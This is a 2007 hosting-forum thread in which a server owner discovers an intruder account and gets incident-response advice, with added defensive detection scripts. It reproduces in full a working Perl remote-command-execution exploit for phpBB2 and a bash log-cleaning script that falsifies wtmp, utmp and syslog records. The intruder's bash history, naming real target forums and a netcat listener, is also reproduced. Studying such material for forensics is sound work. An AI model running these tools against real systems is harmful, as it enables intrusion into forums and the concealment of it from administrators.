viooltje

Well-Known Member
Mar 14, 2004
My root access alert suddenly changed from this:

Root Access ALERT on: Fri Jul 6 02:12:27 CEST 2007 root pts/1 Jul 6 02:12 (a80-126-105-31.adsl.xs4all.nl)

to this:

Root Access ALERT on: Sat Jul 21 02:03:49 CEST 2007 cristi pts/0 Jul 19 16:14 (86.55.185.229)

??

Who or what is a cristi?

Then I tried again and I got this:
(a80-126-105-31.adsl.xs4all.nl)

Root Access ALERT on: Sat Jul 21 03:33:18 CEST 2007 cristi pts/0 Jul 19 16:14 (86.55.185.229) root pts/2 Jul 21 03:33 (a80-126-105-31.adsl.xs4all.nl)

Who or what is cristi? A hacker?

How do I remove this cristi?
 

viooltje

Well-Known Member
Mar 14, 2004
[email protected] [~]# last
root pts/0 a80-126-105-31.a Sat Jul 21 03:56 still logged in
root pts/0 a80-126-105-31.a Sat Jul 21 03:46 - 03:53 (00:07)
root pts/0 a80-126-105-31.a Sat Jul 21 03:43 - 03:46 (00:02)
root pts/2 a80-126-105-31.a Sat Jul 21 03:37 gone - no logout
root pts/2 a80-126-105-31.a Sat Jul 21 03:33 - 03:37 (00:04)
root pts/2 a80-126-105-31.a Sat Jul 21 03:19 - 03:33 (00:13)
cristi pts/1 86.55.185.229 Fri Jul 20 14:27 - 15:20 (00:53)
cristi pts/0 86.55.185.229 Thu Jul 19 16:14 - 03:43 (1+11:29)
cristi pts/0 86.55.185.229 Thu Jul 19 15:52 - 16:10 (00:17)
cristi pts/0 89.32.42.170 Tue Jul 17 00:22 - 01:57 (01:34)
cristi pts/1 89.32.42.170 Mon Jul 16 18:19 - 18:50 (00:30)
cristi pts/0 89.32.42.170 Mon Jul 16 18:17 - 19:11 (00:54)
cristi pts/0 89.32.42.170 Mon Jul 16 11:24 - 12:02 (00:38)
root pts/2 a80-126-105-31.a Fri Jul 13 01:53 - 01:54 (00:00)
root pts/0 a80-126-105-31.a Thu Jul 12 02:58 - 03:11 (00:13)
cristi pts/0 86.127.243.160 Wed Jul 11 23:57 - 00:08 (00:11)
cristi pts/0 86.127.243.160 Wed Jul 11 12:05 - 14:29 (02:23)
cristi pts/3 86.127.243.134 Tue Jul 10 22:22 - 02:54 (04:31)
cristi pts/3 89.32.42.170 Tue Jul 10 22:12 - 22:13 (00:01)
cristi pts/3 86.127.243.134 Tue Jul 10 16:58 - 21:09 (04:10)
cristi pts/3 86.127.243.134 Tue Jul 10 15:01 - 15:22 (00:21)
root pts/0 a80-126-105-31.a Mon Jul 9 23:41 - 01:39 (01:58)
reboot system boot 2.6.9-55.0.2.ELs Mon Jul 9 23:39 (11+04:26)
root pts/1 a80-126-105-31.a Mon Jul 9 22:39 - 22:43 (00:03)
root pts/1 a80-126-105-58.a Mon Jul 9 19:49 - 20:18 (00:29)
root pts/0 a80-126-105-58.a Mon Jul 9 19:03 - 19:56 (00:53)
root pts/0 a80-126-105-31.a Sun Jul 8 03:41 - 04:19 (00:38)
root pts/1 a80-126-105-31.a Sat Jul 7 00:28 - 00:32 (00:03)
root pts/1 a80-126-105-31.a Fri Jul 6 02:12 - 02:29 (00:17)
root pts/0 a80-126-105-31.a Thu Jul 5 01:34 - 02:39 (01:04)
root pts/0 a80-126-105-31.a Thu Jul 5 01:25 - 01:28 (00:02)
root pts/0 a80-126-105-31.a Thu Jul 5 00:02 - 01:24 (01:21)
root pts/0 a80-126-105-31.a Wed Jul 4 22:56 - 23:56 (01:00)
reboot system boot 2.6.9-55.0.2.ELs Wed Jul 4 22:55 (16+05:10)
root pts/0 a80-126-105-31.a Tue Jul 3 22:44 - 23:19 (00:34)

The cristi account has accessed my system.
How can I find out what this account is doing on my system?
Is there a command to retrieve the history list of the other user?
Is there a command to see when this account was created?

Any help would be welcome. Thanks a lot.
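A triage helper for the two questions in this post, added here as an example and not part of the thread. It runs `last`-style output (the sample is a constructed excerpt shaped like the listing above) against allowlists of expected users and source prefixes, and answers "when was the account created" with the proxies a stock Linux box actually keeps, since there is no creation timestamp: the shadow "last password change" day and the change time of the home directory. The allowlist patterns, the file paths and the GNU `date`/`stat` calls are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread). Triage `last` output and estimate when an account appeared.

# Constructed excerpt in the shape of the `last` listing posted above.
SAMPLE_LAST='root     pts/0        a80-126-105-31.a Sat Jul 21 03:56   still logged in
cristi   pts/1        86.55.185.229    Fri Jul 20 14:27 - 15:20  (00:53)
cristi   pts/0        86.55.185.229    Thu Jul 19 16:14 - 03:43  (1+11:29)
cristi   pts/0        89.32.42.170     Tue Jul 17 00:22 - 01:57  (01:34)
root     pts/0        a80-126-105-31.a Mon Jul  9 23:41 - 01:39  (01:58)
reboot   system boot  2.6.9-55.0.2.ELs Mon Jul  9 23:39          (11+04:26)

wtmp begins Tue Jul  3 22:44:10 2007'

# unexpected_logins USERS_RE HOSTS_RE < last-output
# Prints "count user source" for each session whose user is not matched by USERS_RE or whose
# source is not matched by HOSTS_RE. `last` truncates the host column to 16 characters, so
# HOSTS_RE should match a prefix. Console logins have no host column and need separate handling.
unexpected_logins() {
    awk -v users="$1" -v hosts="$2" '
        NF == 0 || $1 == "reboot" || $1 == "wtmp" { next }   # blanks, reboot records, trailer
        $1 !~ users || $3 !~ hosts { print $1, $3 }
    ' | sort | uniq -c | sort -rn | sed 's/^ *//'
}

# account_age_hints USER [PASSWD] [SHADOW] [HOME]
# Linux keeps no "account created" timestamp. The usual proxies: the shadow field "days since
# 1970-01-01 of the last password change" (set by useradd/passwd) and the change time of the
# home directory. The paths are parameters so the function can be run against files copied
# from the compromised disk. (Assumes GNU coreutils `date` and `stat`.)
account_age_hints() {
    user=$1; passwd=${2:-/etc/passwd}; shadow=${3:-/etc/shadow}; home=${4:-/home/$1}
    grep "^$user:" "$passwd" || { echo "no passwd entry for $user"; return 1; }
    days=$(awk -F: -v u="$user" '$1 == u { print $3 }' "$shadow")
    if [ -n "$days" ]; then
        echo "shadow: password last set on day $days ($(date -u -d "@$((days * 86400))" +%F 2>/dev/null))"
    fi
    if [ -d "$home" ]; then
        echo "home: $(stat -c '%n last changed %y' "$home" 2>/dev/null)"
    fi
    # useradd writes an audit line to /var/log/secure on RHEL-style systems, if the log survived
    grep -h "useradd.*name=$user" /var/log/secure* 2>/dev/null || true
    return 0
}

# Demonstration on the constructed sample: the only expected admin is root from the xs4all prefix.
printf '%s\n' "$SAMPLE_LAST" | unexpected_logins '^root$' '^a80-126-105-'
```

Run the first function over the real `last` output (or `last -f` on a copied wtmp) with your own allowlists; every line it prints is a session to explain. The second function answers the "when was it created" question only approximately, and only as long as the attacker has not rewritten the files it reads.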
 

nyjimbo

Well-Known Member
Jan 25, 2003
New York
:( You have been hacked. What they did will take some time to find out. More than one IP was used so either there is more than one person or they are using something else to access your system.

If you can, take the machine offline and start digging. Be sure to isolate any backups from the server so they cannot delete them.

At the very least, look at the main password files to see if they added accounts and check /home to see if new folders have been made, but you have a ton of other things to check out.
 

viooltje

Well-Known Member
Mar 14, 2004
#1184853141
cd /lib/fbi
#1184853259
./f www.darkdeed.net/phpBB/
#1184853607
cat /home/cristi/.bash_history
#1184853618
./f joeys.clanwar.hu/
#1184853656
> /home/cristi/.bash_history
#1184853659
./f joeys.clanwar.hu/
#1184853664
cat /home/cristi/.bash_history
#1184934451
nc -l -p 8000 -vv
#1184854460
cd /lib/fbi
#1184934308
./f www.sandharlanden.net/lan/forum/
#1184934390
./f augu.twbbs.org/phpBB2/
#1184934691
./f augu.twbbs.org/phpBB2/
#1184934695
./f www.japania.org/foorumi/
#1184934908
./f naniwa.starryhometown.net/forum/
#1184934961
./f smallville.andyweb.net/forum/
#1184935055
./f smallville.andyweb.net/forum/
#1184951957
netstat -aut
#1184951970
ps -ax
#1184952010
netatat- ait
#1184952015
netstat -aut
#1184952069
nice
#1184954518
dyweb.net/forum/
#1184954520
./f smallville.andyweb.net/forum/
#1184954608
./f forum.ioche.it/
#1184954637
./f forum.ioche.it/
#1184954745
./f forum.ioche.it/
#1184954792
./f smallville.andyweb.net/forum/
#1184954876
./f smallville.andyweb.net/forum/
#1184961835
./f www.ourtradingclub.com/forum/
#1184961887
./f www.scribbly.net/forum/
#1184961934
./f www.tmetz.net/forums/
#1184962444
./f www.thegrumpystrumpet.com/brassrail/
#1184962504
./f www.jcpbook.com/phpbbX/
#1184962552
./f home.exetel.com.au/getinfo/connect/forum/
#1184962632
./f www.youngrepublicanclub.net/bb/
#1184985536
w
#1184985543
netstat -aut
#1184985646
locate lord
#1184985652
cd /home
#1184985652
ls
#1184985656
cd /var/ww
#1184985660
cd /var/www
#1184985661
ls
#1184985664
cd html
#1184985664
ls
#1184985668
cd ..
#1184985669
cd ..
#1184985670
uname -a

This is what he did. What should I do now?
 

viooltje

Well-Known Member
Mar 14, 2004
He got a /home/cristi with a dir called .ssh which includes a key:

61.59.108.23 ssh-dss AAAAB3NzaC1kc3MAAACBAMT8zkopk+Wu+uZRRi0DxUqyN4fbaJ4...................iaOYv0v2jrjyR+iw0/M19Xwb/IsU/7LmHw=

That's how he accessed it, I think.

How lame to hack a cheap, unsecured one-man machine!!
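An audit helper for the checks nyjimbo suggested above (added accounts, new folders under /home) and for this .ssh finding, added here as an example rather than taken from the thread. One caveat before reading the key: a line of the form `host key-type key`, with an IP address first as quoted above, is the format of `~/.ssh/known_hosts`, which records hosts this account connected *to*; inbound trust lives in `~/.ssh/authorized_keys`, where a line is `[options] key-type key [comment]`. The functions take the passwd file and home root as parameters so they can be pointed at a mounted copy of the disk; the default paths, the hypothetical `/mnt/evidence` mount and all sample data are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): look for added accounts, stray home directories and
# ssh trust files after a compromise. Paths default to the live system but can be pointed at
# a copy (e.g. a mounted image under /mnt/evidence, a hypothetical path).

# uid0_accounts [PASSWD]  -> accounts other than root whose UID is 0
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# orphan_homes [HOMEROOT] [PASSWD]  -> directories under HOMEROOT that no passwd entry points at
# (an account deleted to hide it, or a directory created by hand)
orphan_homes() {
    homeroot=${1:-/home}; passwd=${2:-/etc/passwd}
    for d in "$homeroot"/*/; do
        d=${d%/}
        [ -d "$d" ] || continue
        awk -F: -v h="$d" '$6 == h { found = 1 } END { exit !found }' "$passwd" || echo "$d"
    done
    return 0
}

# ssh_trust_report [HOMEROOT] [PASSWD]  -> "IN  file type comment" per authorized_keys entry
# (who may log IN as that user) and "OUT file host type" per known_hosts entry (where that user
# connected OUT to), for every home named in passwd plus anything else under HOMEROOT.
# Hashed known_hosts entries (|1|...) print their hash instead of a host name.
ssh_trust_report() {
    homeroot=${1:-/home}; passwd=${2:-/etc/passwd}
    {
        awk -F: '{ print $6 }' "$passwd"
        for d in "$homeroot"/*/; do
            if [ -d "$d" ]; then echo "${d%/}"; fi
        done
    } | sort -u | while read -r h; do
        for f in "$h/.ssh/authorized_keys" "$h/.ssh/authorized_keys2"; do
            if [ -f "$f" ]; then
                # the key type may be preceded by options (from="...", command="..."), so scan the fields
                awk -v f="$f" '
                    /^[[:space:]]*(#|$)/ { next }
                    { for (i = 1; i <= NF; i++)
                          if ($i ~ /^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-)/) {
                              print "IN ", f, $i, (i + 2 <= NF ? $(i + 2) : "(no comment)"); break } }' "$f"
            fi
        done
        f="$h/.ssh/known_hosts"
        if [ -f "$f" ]; then
            awk -v f="$f" '/^[[:space:]]*(#|$)/ { next } { print "OUT", f, $1, $2 }' "$f"
        fi
    done
    return 0
}
```

Every `IN` line is a key that can log in without a password and must be recognised by its owner or removed; every `OUT` line from an account you did not create is a host worth reporting alongside the source IPs in the `last` output. Also check root's own .ssh directory, which the passwd-driven loop includes.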
 

nyjimbo

Well-Known Member
Jan 25, 2003
New York
Judging from your "last" command he was in several times over the last week or so. Sometimes for over an hour.

I think he loaded something on port 8000 using netcat to test it first.

But your list of commands here is likely to only be a small chunk of what he did during all that time.

You really need to isolate this machine and start digging. Worst case scenario, you have to reload the O/S and reload good backups.
 

nyjimbo

Well-Known Member
Jan 25, 2003
New York
He got a /home/cristi with a dir called .ssh which includes a key:

61.59.108.23 ssh-dss AAAAB3NzaC1kc3MAAACBAMT8zkopk+Wu+uZRRi0DxUqyN4fbaJ4...................iaOYv0v2jrjyR+iw0/M19Xwb/IsU/7LmHw=

That's how he accessed it, I think.

How lame to hack a cheap, unsecured one-man machine!!
h23-61-59-108.chinup.com.tw is where he most likely resides. Hacking any machine gives them a lot of power; if he truly owns the box he can make it do anything for free and you get the blame.

:(
 

nyjimbo

Well-Known Member
Jan 25, 2003
New York
If you do not own the machine you might contact your ISP/HOST and they might help you for free, but most likely they will tell you to reload the O/S and the backups of everything.

However, when that's done you will be back to the point right before you got hacked, so you would need to find out what let them in.
 

verdon

Well-Known Member
Nov 1, 2003
Northern Ontario, Canada
cPanel Access Level
Root Administrator
I too think you should start fresh. That's just based on reading these forums for a couple of years. I only have experience with configserver.com (user chirpy here) for paid services of the sort you need, and have been very happy with them. I'm sure there are other users here that are good too, but I can only personally recommend them.

Good luck.
 

lehels

Well-Known Member
Jul 10, 2006
Which person or company should I hire to solve this problem?
Someone who "speaks" the Unix language.

Don't forget a firewall!
Change the usual SSH port.

Keep an eye on your intruder; precisely deny all unwanted access.

Good luck,
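An added example, not from the thread, of checking an `sshd_config` for the points made in this post: root logins, password logins, an explicit list of accounts allowed in (which is what "deny all unwanted access" means for ssh) and the port. sshd honours the first occurrence of a keyword, so the audit reads the file the same way; it does not evaluate `Match` blocks and it does not cover the firewall side. The "weak" and "hardened" fragments and the user name in `AllowUsers` are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): audit sshd_config for the points raised above.
# sshd uses the FIRST occurrence of each keyword, so later duplicates are ignored here too.
# Match blocks are not evaluated.

# Constructed "before" and "after" fragments.
WEAK_SSHD_CONFIG='Port 22
PermitRootLogin yes
PasswordAuthentication yes'

HARDENED_SSHD_CONFIG='Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowUsers viooltje
MaxAuthTries 3'

# sshd_effective KEYWORD < sshd_config -> the value sshd will use (first match, keyword case-insensitive)
sshd_effective() {
    awk -v k="$1" '
        BEGIN { k = tolower(k) }
        /^[[:space:]]*(#|$)/ { next }
        tolower($1) == k { $1 = ""; sub(/^[[:space:]]+/, ""); print; exit }'
}

# sshd_audit < sshd_config -> one finding per line (none for a hardened file); always returns 0
sshd_audit() {
    cfg=$(cat)
    eff() { printf '%s\n' "$cfg" | sshd_effective "$1"; }
    if [ "$(eff PermitRootLogin)" != no ]; then
        echo "PermitRootLogin is not 'no': log in as a named user and escalate with su/sudo"
    fi
    if [ "$(eff PasswordAuthentication)" != no ]; then
        echo "PasswordAuthentication is not 'no': use keys; password guessing is what hits port 22 all day"
    fi
    if [ -z "$(eff AllowUsers)" ]; then
        echo "AllowUsers unset: any account, including one an intruder adds, may log in over ssh"
    fi
    port=$(eff Port)
    if [ -z "$port" ] || [ "$port" = 22 ]; then
        echo "Port is 22 (default): a non-standard port cuts scanner noise but is not a security control by itself"
    fi
    return 0
}

# Demonstration: the weak fragment produces four findings, the hardened one none.
printf '%s\n' "$WEAK_SSHD_CONFIG" | sshd_audit
```

Run it as `sshd_audit < /etc/ssh/sshd_config` on the rebuilt machine, and remember that `AllowUsers` would have blocked the added account in this thread from logging in over ssh at all, whatever password or key it had.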
 

viooltje

Well-Known Member
Mar 14, 2004
What does this do:
./f www.darkdeed.net/phpBB/

He is using this code in the f file:
perl a -u http://$1 -L z3c3v3 -P fbiteam -i 2


and a lot of scripts containing this code:

#!/usr/bin/perl

use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;

getopts("u:L:P:i:p:eek::");

$url = $opt_u;
$login = $opt_L;
$password = $opt_P;
$id = $opt_i || 2;
$prefix = $opt_p || 'phpbb_';
$proxy = $opt_o;

if(!$url || !$login || !$password){&usage;}

$|++;

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$xpl->proxy('http'=>'http://'.$proxy) if $proxy;
$ids = 'IDS:r57 phpBB2 exploit a2e2#20022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
$res = $xpl->post($url.'login.php',
[
"username" => "$login",
"password" => "$password",
"autologin" => "on",
"admin" => "1",
"login" => "Log in",
],"User-Agent" => "$ids");
$cookie_jar->extract_cookies($res);
if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }
while ()
{
print "by Alexander for FbiTeam\n";
print "Command for execute or 'exit' for exit # ";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
exit() if ($cmd eq 'exit');
last;
}
&run($cmd);
}

sub run($)
{
$sql = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
&phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);
$res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
@result = split(/\n/,$res->content);
$data = '';
$on = $start = $end = 0;
for (@result)
{
if (/_END_/) { $end = 1; last; }
if ($on) { $data .= $_."\n"; }
if (/_START_/) { $on = 1; $start = 1; }
}
if($start&&$end) { print $data."\r\n"; }
}

sub phpbb_sql_query($$){
$res = $xpl->post("$_[0]",
Content_type => 'form-data',
Content => [
perform => 'restore',
restore_start => 'Start Restore',
backup_file => [
undef,
'0wneeeeedddd',
Content_type => 'text/plain',
Content => "$_[1]",
],
]
,"User-Agent" => "$ids");
}

sub usage()
{
print "\\=--------------------------------------=/\r\n";
print "| phpBB admin2exec exploit by Alexander |\r\n";
print "| version 2 (user_sig_bbcode_uid) |\r\n";
print "/=--------------------------------------=\\\r\n";
print "\r\n Usage: a [OPTIONS]\r\n\r\n";
print " Options:\r\n";
print " -u - path to forum e.g. http://site/f...)\r\n"; exit(); }

??? phpbb hacker?
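From the other side of the fence, this is how the tool pasted above shows up in the logs of a phpBB2 forum it is run against, as an added example that is not part of the thread. The script sends a fixed User-Agent beginning `IDS:r57 phpBB2 exploit`, followed by the URL, login and password it was given, so a hit in an access log also says which admin credential was used and must be rotated; it then logs in via `login.php`, POSTs to `admin/admin_db_utilities.php` with `perform=restore`, and reads the result back from `profile.php?mode=editprofile`. The function below scans Apache combined-format lines for the first two markers; the log lines, IPs and credential values are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): spot the pasted phpBB2 tool in a forum's Apache access log.

# Constructed combined-format lines; IPs, session ids and credential values are made up.
SAMPLE_ACCESS_LOG='10.0.0.5 - - [19/Jul/2007:16:20:01 +0200] "GET /phpBB/index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.9 - - [19/Jul/2007:16:21:07 +0200] "POST /phpBB/login.php HTTP/1.1" 302 - "-" "IDS:r57 phpBB2 exploit a2e2#20022006|http://forum.example/phpBB/|admin|s3cret|2|phpbb_"
10.0.0.9 - - [19/Jul/2007:16:21:08 +0200] "POST /phpBB/admin/admin_db_utilities.php?sid=0123456789abcdef0123456789abcdef HTTP/1.1" 200 512 "-" "IDS:r57 phpBB2 exploit a2e2#20022006|http://forum.example/phpBB/|admin|s3cret|2|phpbb_"
10.0.0.9 - - [19/Jul/2007:16:21:09 +0200] "GET /phpBB/profile.php?mode=editprofile&sid=0123456789abcdef0123456789abcdef HTTP/1.1" 200 4096 "-" "IDS:r57 phpBB2 exploit a2e2#20022006|http://forum.example/phpBB/|admin|s3cret|2|phpbb_"
10.0.0.7 - - [19/Jul/2007:16:30:00 +0200] "POST /phpBB/admin/admin_db_utilities.php?sid=fedcba9876543210fedcba9876543210 HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

# phpbb_exploit_hits < access_log
# Prints "marker client-ip timestamp" for each request that carries the tool's User-Agent, or
# that posts to the admin DB-restore page (a legitimate admin action, so the second marker
# needs a human to compare the client IP with the admins' usual addresses). A request that
# matches both is reported once, under the User-Agent marker.
phpbb_exploit_hits() {
    awk '
        /"IDS:r57 phpBB2 exploit/ { print "user-agent-signature", $1, $4; next }
        /"POST \/[^" ]*admin\/admin_db_utilities\.php/ { print "db-restore-post", $1, $4 }
    '
}

# leaked_admin_logins < access_log
# Distinct login names the tool embedded in its User-Agent, i.e. the admin accounts whose
# passwords were in the attacker's hands. In combined format the User-Agent is the 6th
# double-quote-delimited field; the tool separates its fields with "|".
leaked_admin_logins() {
    awk -F'"' '{ ua = $6 } ua ~ /^IDS:r57 phpBB2 exploit/ { n = split(ua, p, "|"); if (n >= 3) print p[3] }' | sort -u
}

printf '%s\n' "$SAMPLE_ACCESS_LOG" | phpbb_exploit_hits
```

On the compromised box itself the interesting artefacts are the other way round: the forum paths in the .bash_history above are the sites whose operators should be told, and `/lib/fbi` is a directory no package owns and should not exist.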
 

nyjimbo

Well-Known Member
Jan 25, 2003
New York
??? phpbb hacker?
At least. I mean he has full access to your computer so for now he is launching phpbb exploit attacks. Given enough time he will turn your machine into a super hacking server.
 

viooltje

Well-Known Member
Mar 14, 2004
Hacked and more found zxc-Antilog c0ded By [ Alexander ] (WhiteHat.ro)

Can't find anything on Google nor in the forums. Does someone know something about this stuff?

Found this in the 'anti.pdf' file:

#!/bin/bash
#
# zxc-Antilog V 0.1
#
# usage : to Exchanging your IP with fake IP at your choice
#
# and to clear your last command's and clear logout history
#
# Remember that...
#
# Whitehat 2006
#
#
clear
echo "--------------------------------------------------------------------------------------------------------------------"
echo " zxc-Antilog c0ded By [ Alexander ] (WhiteHat.ro) - [email protected] "
echo "--------------------------------------------------------------------------------------------------------------------"
if [ "$UID" = "0" ];then
echo " h3re w3 g0 "
else
echo " `whoami` y0 must be login by root"
fi
echo -n " What's the ip y0 want to spoof it ? "
read word
word=$word
echo -n " What's the Fake ip y0 want using it ? "
read fake
fake=$fake
r0x="yes"
if [ ! -f /var/log/lastlog ]; then
r0x="no"
echo " i can't find lastlog"
fi
if [ "$r0x" = "yes" ]; then
echo " Editing lastlog"
sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
mv /var/log/lastlog.new /var/log/lastlog
fi
syslog="yes"
if [ ! -f /var/log/syslog ]; then
echo " i can't find syslog"
syslog="no"
fi
if [ "$syslog" = "yes" ]; then
echo " Editing syslog"
sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
mv /var/log/syslog.new /var/log/syslog
fi
mess="yes"
if [ ! -f /var/log/messages ]; then
echo " i can't find message "
mess="no"
fi
if [ "$mess" = "yes" ]; then
echo " Editing message"
sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
mv /var/log/messages.new /var/log/messages
fi
http="yes"
if [ ! -f /var/log/httpd/access_log ]; then
echo " i can't find access_log "
http="no"
fi
if [ "$http" = "yes" ]; then
echo " Editing access_log"
sed "s/$word/$fake/g" /var/log/httpd/access_log > /var/log/httpd/access_log.new
mv /var/log/httpd/access_log.new /var/log/httpd/access_log
fi
httpd="yes"
if [ ! -f /var/log/httpd/error_log ]; then
echo " i can't find error_log "
httpd="no"
fi
if [ "$httpd" = "yes" ]; then
echo " Editing error_log "
sed "s/$word/$fake/g" /var/log/httpd/error_log > /var/log/httpd/error_log.new
mv /var/log/httpd/error_log.new /var/log/httpd/error_log
fi
wtmp="yes"
if [ ! -f /var/log/wtmp ]; then
echo " i can't find wtmp "
wtmp="no"
fi
if [ "$wtmp" = "yes" ]; then
echo " Editing wtmp "
sed "s/$word/$fake/g" /var/log/wtmp > /var/log/wtmp.new
mv /var/log/wtmp.new /var/log/wtmp
fi
secure="yes"
if [ ! -f /var/log/secure ]; then
echo " i can't find secure "
secure="no"
fi
if [ "$secure" = "yes" ]; then
echo " Editing secure "
sed "s/$word/$fake/g" /var/log/secure > /var/log/secure.new
mv /var/log/secure.new /var/log/secure
fi
xferlog="yes"
if [ ! -f /var/log/xferlog ]; then
echo " i can't find xferlog "
xferlog="no"
fi
if [ "$xferlog" = "yes" ]; then
echo " Editing xferlog "
sed "s/$word/$fake/g" /var/log/xferlog > /var/log/xferlog.new
mv /var/log/xferlog.new /var/log/xferlog
fi
utmp="yes"
if [ ! -f /var/run/utmp ]; then
echo " i can't find utmp "
utmp="no"
fi
if [ "$utmp" = "yes" ]; then
echo " Editing utmp "
sed "s/$word/$fake/g" /var/run/utmp > /var/run/utmp.new
mv /var/run/utmp.new /var/run/utmp
fi
echo -n " if y0 want to delete the last commands type (yes) if y0 don't type (no) 0r anything "
read command
if [ "$command" = "yes" ]; then
echo "##Now the last commands y0 put it will go to hell ^_^ ##"
echo -n > ~/.bash_history
history -c
echo -n " y0 have one minute to exit from server..go0d luck "
/etc/init.d/atd start
echo "sed 's/$word/$fake/g' /var/run/utmp > /var/run/utmp.new" | at now + 1 minute
echo "mv /var/run/utmp.new /var/run/utmp" | at now + 2 minute
echo " zxc-Antilog Ended work... Cheers ! "
exit 0
else
echo -n " y0 have one minute to exit from server..go0d luck "
/etc/init.d/atd start
echo "sed 's/$word/$fake/g' /var/run/utmp > /var/run/utmp.new" | at now + 1 minute
echo "mv /var/run/utmp.new /var/run/utmp" | at now + 2 minute
echo " zxc-Antilog Ended work... Cheers ! "
exit 0
fi
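The script above rewrites the binary login records (`wtmp`, `utmp`, `lastlog`) with `sed`, which is also what gives it away: those files are arrays of fixed-size records (384 bytes per `struct utmp` on glibc/Linux), and substituting one IP string for another of a different length shifts every record after it, so the file size stops being a multiple of the record size and `last` starts printing garbage. It also leaves `*.new` temporaries and a queued `at` job behind. The checks below, an added example and not from the thread, look for exactly that residue; the record sizes and the directories searched are assumptions about the system in question.

```shell
#!/bin/sh
# Added example (not from the thread): detect the traces the pasted log cleaner leaves behind.

UTMP_RECORD=384      # sizeof(struct utmp) on glibc/Linux (wtmp, utmp, btmp)
LASTLOG_RECORD=292   # sizeof(struct lastlog) on glibc/Linux; the file is indexed by UID

# record_size_check FILE [RECORD]  -> "ok"/"CORRUPT" line; returns 1 when FILE's size is not a
# multiple of RECORD, which is what a length-changing sed over a utmp-style file produces.
record_size_check() {
    file=$1; rec=${2:-$UTMP_RECORD}
    size=$(wc -c < "$file" | tr -d ' ') || return 1
    if [ $((size % rec)) -eq 0 ]; then
        echo "ok $file: $((size / rec)) records of $rec bytes"
        return 0
    fi
    echo "CORRUPT $file: $size bytes is not a multiple of $rec (records after the edit are misaligned)"
    return 1
}

# antilog_residue [DIR...]  -> leftover *.new temporaries under the given directories
# (default /var/log and /var/run) plus whatever is pending in the at queue, since the script
# schedules its final utmp rewrite with `at now + 1 minute` and starts atd to make sure it runs.
antilog_residue() {
    [ $# -gt 0 ] || set -- /var/log /var/run
    for d in "$@"; do
        find "$d" -maxdepth 2 -name '*.new' 2>/dev/null || true
    done
    atq 2>/dev/null || true
    return 0
}

# check_login_records  -> run the size check over the usual files on a live box
check_login_records() {
    for f in /var/log/wtmp /var/log/btmp /var/run/utmp; do
        if [ -f "$f" ]; then record_size_check "$f" || true; fi
    done
    if [ -f /var/log/lastlog ]; then record_size_check /var/log/lastlog "$LASTLOG_RECORD" || true; fi
    return 0
}
```

A clean file passes the size check, but passing does not prove the file is untouched: if the fake IP the attacker typed has exactly the same length as the real one, the records stay aligned and only the content lies. The text logs the script edits (`secure`, `messages`, the Apache logs) are best cross-checked against copies shipped off the machine, which is the real defence against this class of tool.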
 

nyjimbo

Well-Known Member
Jan 25, 2003
New York
Your system was rooted yesterday, isn't that right? Expect to find more and more stuff until you restore the machine and block out whatever is letting them in.
 

dgbaker

Well-Known Member
PartnerNOC
Sep 20, 2002
Toronto, Ontario Canada
cPanel Access Level
DataCenter Provider
You need to get that server off the network and the internet. The longer it is up, the more damage is done. On top of that, because your server has been compromised you are putting others at risk of an attack from your server.

Take it offline, and start rebuilding and closing the holes.